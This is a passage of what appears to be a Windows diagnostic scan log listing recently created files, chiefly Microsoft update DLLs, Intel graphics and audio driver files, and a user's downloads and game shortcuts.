2016-01-27 15:17 - 2016-01-16 00:33 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcli.dll
2016-01-27 15:17 - 2016-01-16 00:32 - 24602624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-01-27 15:17 - 2016-01-16 00:31 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2016-01-27 15:17 - 2016-01-16 00:31 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-01-27 15:17 - 2016-01-16 00:31 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2016-01-27 15:17 - 2016-01-16 00:30 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-01-27 15:17 - 2016-01-16 00:30 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SimCfg.dll
2016-01-27 15:17 - 2016-01-16 00:28 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-01-27 15:17 - 2016-01-16 00:28 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SimAuth.dll
2016-01-27 15:17 - 2016-01-16 00:26 - 19338752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-01-27 15:17 - 2016-01-16 00:26 - 00535040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2016-01-27 15:17 - 2016-01-16 00:25 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcli.dll
2016-01-27 15:17 - 2016-01-16 00:24 - 18678272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-01-27 15:17 - 2016-01-16 00:24 - 02057216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll
2016-01-27 15:17 - 2016-01-16 00:24 - 00613888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2016-01-27 15:17 - 2016-01-16 00:24 - 00273408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2016-01-27 15:17 - 2016-01-16 00:21 - 06297088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-01-27 15:17 - 2016-01-16 00:19 - 12126208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-01-27 15:17 - 2016-01-16 00:18 - 03593216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-01-27 15:17 - 2016-01-16 00:17 - 05503488 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2016-01-27 15:17 - 2016-01-16 00:15 - 04759040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2016-01-27 15:17 - 2016-01-16 00:14 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-01-27 15:17 - 2016-01-16 00:14 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-01-27 15:16 - 2016-01-16 01:37 - 00202472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll
2016-01-27 15:16 - 2016-01-16 01:36 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-01-27 15:16 - 2016-01-16 01:36 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-01-27 15:16 - 2016-01-16 01:34 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-01-27 15:16 - 2016-01-16 01:24 - 00538632 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2016-01-27 15:16 - 2016-01-16 01:23 - 00848160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-01-27 15:16 - 2016-01-16 01:23 - 00785088 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2016-01-27 15:16 - 2016-01-16 01:23 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-01-27 15:16 - 2016-01-16 01:23 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-01-27 15:16 - 2016-01-16 01:23 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-01-27 15:16 - 2016-01-16 01:21 - 22572624 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-01-27 15:16 - 2016-01-16 01:21 - 01750440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcMon.exe
2016-01-27 15:16 - 2016-01-16 01:20 - 00652312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2016-01-27 15:16 - 2016-01-16 01:20 - 00431240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll
2016-01-27 15:16 - 2016-01-16 01:20 - 00366224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
2016-01-27 15:16 - 2016-01-16 01:19 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-01-27 15:16 - 2016-01-16 01:19 - 00405568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2016-01-27 15:16 - 2016-01-16 01:12 - 01415200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-01-27 15:16 - 2016-01-16 01:08 - 01174008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-01-27 15:16 - 2016-01-16 01:08 - 00440152 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2016-01-27 15:16 - 2016-01-16 00:46 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbser.sys
2016-01-27 15:16 - 2016-01-16 00:44 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-01-27 15:16 - 2016-01-16 00:44 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasadhlp.dll
2016-01-27 15:16 - 2016-01-16 00:44 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastlsext.dll
2016-01-27 15:16 - 2016-01-16 00:42 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-01-27 15:16 - 2016-01-16 00:41 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2016-01-27 15:16 - 2016-01-16 00:40 - 00106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasauto.dll
2016-01-27 15:16 - 2016-01-16 00:40 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcaui.exe
2016-01-27 15:16 - 2016-01-16 00:40 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasautou.exe
2016-01-27 15:16 - 2016-01-16 00:39 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\FilterDS.dll
2016-01-27 15:16 - 2016-01-16 00:38 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-01-27 15:16 - 2016-01-16 00:38 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\system32\SimCfg.dll
2016-01-27 15:16 - 2016-01-16 00:38 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winbio.dll
2016-01-27 15:16 - 2016-01-16 00:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-01-27 15:16 - 2016-01-16 00:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-01-27 15:16 - 2016-01-16 00:37 - 00190464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll
2016-01-27 15:16 - 2016-01-16 00:37 - 00073728 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-01-27 15:16 - 2016-01-16 00:36 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-01-27 15:16 - 2016-01-16 00:36 - 00475648 _____ (Microsoft Corporation) C:\WINDOWS\system32\DDDS.dll
2016-01-27 15:16 - 2016-01-16 00:36 - 00221696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-01-27 15:16 - 2016-01-16 00:36 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SimAuth.dll
2016-01-27 15:16 - 2016-01-16 00:36 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastlsext.dll
2016-01-27 15:16 - 2016-01-16 00:35 - 00383488 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-01-27 15:16 - 2016-01-16 00:35 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasadhlp.dll
2016-01-27 15:16 - 2016-01-16 00:34 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-01-27 15:16 - 2016-01-16 00:34 - 00477696 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll
2016-01-27 15:16 - 2016-01-16 00:34 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-01-27 15:16 - 2016-01-16 00:33 - 00574976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll
2016-01-27 15:16 - 2016-01-16 00:33 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-01-27 15:16 - 2016-01-16 00:32 - 00621568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2016-01-27 15:16 - 2016-01-16 00:32 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pcaui.exe
2016-01-27 15:16 - 2016-01-16 00:31 - 00851456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-01-27 15:16 - 2016-01-16 00:31 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasautou.exe
2016-01-27 15:16 - 2016-01-16 00:30 - 02127360 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-01-27 15:16 - 2016-01-16 00:30 - 01053696 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-01-27 15:16 - 2016-01-16 00:30 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-01-27 15:16 - 2016-01-16 00:30 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winbio.dll
2016-01-27 15:16 - 2016-01-16 00:29 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2016-01-27 15:16 - 2016-01-16 00:29 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-01-27 15:16 - 2016-01-16 00:28 - 09918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-01-27 15:16 - 2016-01-16 00:28 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-01-27 15:16 - 2016-01-16 00:28 - 00884736 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasdlg.dll
2016-01-27 15:16 - 2016-01-16 00:27 - 00335872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2016-01-27 15:16 - 2016-01-16 00:26 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-01-27 15:16 - 2016-01-16 00:26 - 00260608 _____ C:\WINDOWS\system32\MTFServer.dll
2016-01-27 15:16 - 2016-01-16 00:26 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-01-27 15:16 - 2016-01-16 00:25 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-01-27 15:16 - 2016-01-16 00:25 - 00235008 _____ C:\WINDOWS\system32\MTF.dll
2016-01-27 15:16 - 2016-01-16 00:24 - 00350720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-01-27 15:16 - 2016-01-16 00:23 - 02050048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2016-01-27 15:16 - 2016-01-16 00:23 - 00687616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-01-27 15:16 - 2016-01-16 00:20 - 07199232 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-01-27 15:16 - 2016-01-16 00:20 - 02597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-01-27 15:16 - 2016-01-16 00:20 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-01-27 15:16 - 2016-01-16 00:20 - 00799744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasdlg.dll
2016-01-27 15:16 - 2016-01-16 00:19 - 00733184 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2016-01-27 15:16 - 2016-01-16 00:19 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-01-27 15:16 - 2016-01-16 00:19 - 00162816 _____ C:\WINDOWS\SysWOW64\MTF.dll
2016-01-27 15:16 - 2016-01-16 00:19 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-01-27 15:16 - 2016-01-16 00:18 - 01674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2016-01-27 15:16 - 2016-01-16 00:16 - 05202944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-01-27 15:16 - 2016-01-16 00:16 - 01542656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2016-01-27 15:16 - 2016-01-16 00:11 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2016-01-27 15:16 - 2016-01-16 00:09 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-01-27 12:28 - 2016-01-27 12:26 - 00002030 _____ C:\Users\sesay\Desktop\firewall security.txt
2016-01-27 12:26 - 2016-01-27 12:26 - 00002030 _____ C:\Users\sesay\Documents\firewall security.txt
2016-01-27 11:32 - 2016-01-27 11:32 - 00000000 ____D C:\Users\sesay\AppData\Local\Citrix
2016-01-26 21:52 - 2016-01-26 21:52 - 00000222 _____ C:\Users\sesay\Desktop\Unturned.url
2016-01-25 21:06 - 2016-01-26 21:22 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Trove
2016-01-25 20:54 - 2016-01-25 20:54 - 00000222 _____ C:\Users\sesay\Desktop\Trove.url
2016-01-25 17:23 - 2011-04-13 14:56 - 00245792 _____ C:\Users\sesay\Downloads\MCSkinEdit.jar
2016-01-25 17:17 - 2016-01-25 17:17 - 00000000 ____D C:\Users\MuhammadAkim\AppData\Local\Mega Limited
2016-01-24 21:05 - 2016-01-24 21:20 - 186613007 _____ C:\Users\sesay\Desktop\Recording #5.mp4
2016-01-22 16:13 - 2016-01-24 21:29 - 00000000 ____D C:\Users\sesay\Desktop\Cloud Drive
2016-01-22 16:01 - 2016-01-22 16:01 - 00002443 _____ C:\Users\sesay\Desktop\AquaKnight563 - Chrome.lnk
2016-01-22 15:48 - 2016-01-22 15:48 - 00927824 _____ (Google Inc.) C:\Users\sesay\Downloads\ChromeSetup.exe
2016-01-22 15:36 - 2016-01-22 15:55 - 00000000 ___RD C:\Users\sesay\Documents\MEGA
2016-01-22 15:33 - 2016-01-22 15:43 - 00000000 ____D C:\Users\sesay\Documents\MEGAsync Downloads
2016-01-22 15:33 - 2016-01-22 15:33 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MEGAsync
2016-01-22 15:33 - 2016-01-22 15:33 - 00000000 ____D C:\Users\sesay\AppData\Local\Mega Limited
2016-01-22 15:31 - 2016-01-22 15:32 - 10335064 _____ (MEGA Limited) C:\Users\sesay\Downloads\MEGAsyncSetup.exe
2016-01-21 09:24 - 2016-01-21 09:24 - 00000000 ____D C:\Users\sesay\Documents\Curse
2016-01-21 09:21 - 2016-01-25 21:39 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Curse Client
2016-01-21 09:21 - 2016-01-21 09:21 - 00001088 _____ C:\Users\sesay\Desktop\Curse.lnk
2016-01-21 09:21 - 2016-01-21 09:21 - 00001074 _____ C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Curse.lnk
2016-01-21 09:20 - 2016-01-21 09:20 - 51968480 _____ (Curse) C:\Users\sesay\Downloads\CurseClientSetup.exe
2016-01-21 09:20 - 2016-01-21 09:20 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Curse
2016-01-19 23:15 - 2016-01-19 23:15 - 32710176 _____ (Intel Corporation) C:\WINDOWS\system32\igdumdim64.dll
2016-01-19 23:15 - 2016-01-19 23:15 - 31776384 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdumdim32.dll
2016-01-19 23:15 - 2016-01-19 23:15 - 01816720 _____ (Intel Corporation) C:\WINDOWS\system32\iglhsip64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 27589696 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igd11dxva32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 15470112 _____ (Intel Corporation) C:\WINDOWS\system32\igc64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 13442816 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igc32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 11449472 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igd10iumd32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 05046200 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdusc32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 04507576 _____ (Intel Corporation) C:\WINDOWS\system32\igd12umd64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 04352888 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igd12umd32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 02160464 _____ (Intel Corporation) C:\WINDOWS\system32\igdmd64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 01814056 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\iglhsip32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 01677872 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdmd32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00435088 _____ (Intel Corporation) C:\WINDOWS\system32\igfx11cmrt64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00433968 _____ (Intel Corporation) C:\WINDOWS\system32\igfxcmrt64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00381928 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igfx11cmrt32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00379792 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igfxcmrt32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00312808 _____ (Intel Corporation) C:\WINDOWS\system32\igd10idpp64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00297168 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igd10idpp32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00242160 _____ (Intel Corporation) C:\WINDOWS\system32\iglhcp64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00222736 _____ (Intel Corporation) C:\WINDOWS\system32\igdde64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00205360 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\iglhcp32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00181328 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdde32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00055248 _____ (Intel Corporation) C:\WINDOWS\system32\igfxexps.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 29101576 _____ (Intel Corporation) C:\WINDOWS\system32\common_clang64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 19861512 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\common_clang32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 11591688 _____ (Intel Corporation) C:\WINDOWS\system32\ig75icd64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 08638472 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\ig75icd32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 05685760 _____ (Intel Corporation) C:\WINDOWS\system32\igdmcl64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 05262856 _____ (Intel Corporation) C:\WINDOWS\system32\GfxResources.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 04638720 _____ (Intel Corporation) C:\WINDOWS\system32\igdrcl64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 04170248 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdrcl32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 03970056 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdmcl32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 01576960 _____ (Intel Corporation) C:\WINDOWS\system32\igfxcmjit64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 01167880 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igfxcmjit32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 01027032 _____ C:\WINDOWS\system32\igfxSDK.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00963032 _____ (Intel Corporation) C:\WINDOWS\system32\Gfxv4_0.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00959456 _____ (Intel Corporation) C:\WINDOWS\system32\Gfxv2_0.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00626696 _____ (Intel Corporation) C:\WINDOWS\system32\MetroIntelGenericUIFramework.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00623064 _____ (Intel Corporation) C:\WINDOWS\system32\IntelCpHDCPSvc.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00536536 _____ (Intel Corporation) C:\WINDOWS\system32\IntelWiDiUMS64.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00466912 _____ (Intel Corporation) C:\WINDOWS\system32\GfxUIEx.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00439304 _____ (Intel Corporation) C:\WINDOWS\system32\igdbcl64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00416256 _____ (Intel Corporation) C:\WINDOWS\system32\IntelOpenCL64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00402904 _____ C:\WINDOWS\system32\igfxTray.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00390144 _____ (Intel Corporation) C:\WINDOWS\system32\igfxOSP.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00388616 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdbcl32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00350184 _____ (Intel Corporation) C:\WINDOWS\system32\IntelWiDiMCComp64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00318472 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\IntelOpenCL32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00273416 _____ C:\WINDOWS\system32\igfxCPL.cpl
2016-01-19 23:12 - 2016-01-19 23:12 - 00266240 _____ (Intel Corporation) C:\WINDOWS\system32\igdfcl64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00255488 _____ (Intel Corporation) C:\WINDOWS\system32\igfxDTCM.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00237016 _____ (Intel Corporation) C:\WINDOWS\system32\igfxext.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00232408 _____ (Intel Corporation) C:\WINDOWS\system32\DPTopologyApp.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00231904 _____ (Intel Corporation) C:\WINDOWS\system32\DPTopologyAppv2_0.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00225288 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdfcl32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00206848 _____ (Intel Corporation) C:\WINDOWS\system32\igfxCoIn_v4360.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00193032 _____ (Intel Corporation) C:\WINDOWS\system32\igdail64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00175064 _____ (Intel Corporation) C:\WINDOWS\system32\difx64.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00173064 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdail32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00111624 _____ ( ) C:\WINDOWS\system32\igfxSDKLibv2_0.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00103944 _____ (Khronos Group) C:\WINDOWS\SysWOW64\Intel_OpenCL_ICD32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00103432 _____ C:\WINDOWS\system32\igfxCUIServicePS.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00100864 _____ ( ) C:\WINDOWS\system32\igfxSDKLib.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00099848 _____ (Khronos Group) C:\WINDOWS\system32\Intel_OpenCL_ICD64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00095240 _____ ( ) C:\WINDOWS\system32\igfxDHLibv2_0.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00083456 _____ ( ) C:\WINDOWS\system32\igfxDHLib.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00052744 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igfxexps32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00029192 _____ ( ) C:\WINDOWS\system32\igfxDILibv2_0.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00029192 _____ ( ) C:\WINDOWS\system32\igfxDILib.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00027656 _____ ( ) C:\WINDOWS\system32\igfxEMLib.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00027648 _____ ( ) C:\WINDOWS\system32\igfxEMLibv2_0.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00022536 _____ ( ) C:\WINDOWS\system32\igfxLHMLib.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00022528 _____ ( ) C:\WINDOWS\system32\igfxLHMLibv2_0.dll
2016-01-19 19:28 - 2016-01-19 19:28 - 00014155 _____ C:\Users\sesay\Downloads\WORKSHEETCSECTIONCHECKLISTBACKGROUND.pdf
2016-01-15 00:24 - 2016-01-15 00:24 - 10093736 _____ (Intel Corporation) C:\WINDOWS\system32\IntelSSTAPO.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 03319456 _____ (Fortemedia Corporation) C:\WINDOWS\system32\FMAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 02157920 _____ (DTS, Inc.) C:\WINDOWS\system32\sltech64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01624744 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64APO.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01456464 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRRPTR64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01377072 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTCOM64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01348880 _____ (DTS, Inc.) C:\WINDOWS\system32\slcnt64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01037968 _____ (DTS, Inc.) C:\WINDOWS\system32\sl3apo64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00704696 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtDataProc64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00602984 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SECOMN32.DLL
2016-01-15 00:24 - 2016-01-15 00:24 - 00588632 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAC64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00545816 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00479992 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00399464 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEP64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00393480 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00355496 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtlCPAPI64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00352904 _____ (Synopsys, Inc.) C:\WINDOWS\SysWOW64\SRCOM.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00352904 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00342272 _____ (Waves Audio Ltd.) C:\WINDOWS\system32\MaxxAudioAPO20.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00333288 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DHT64.dll
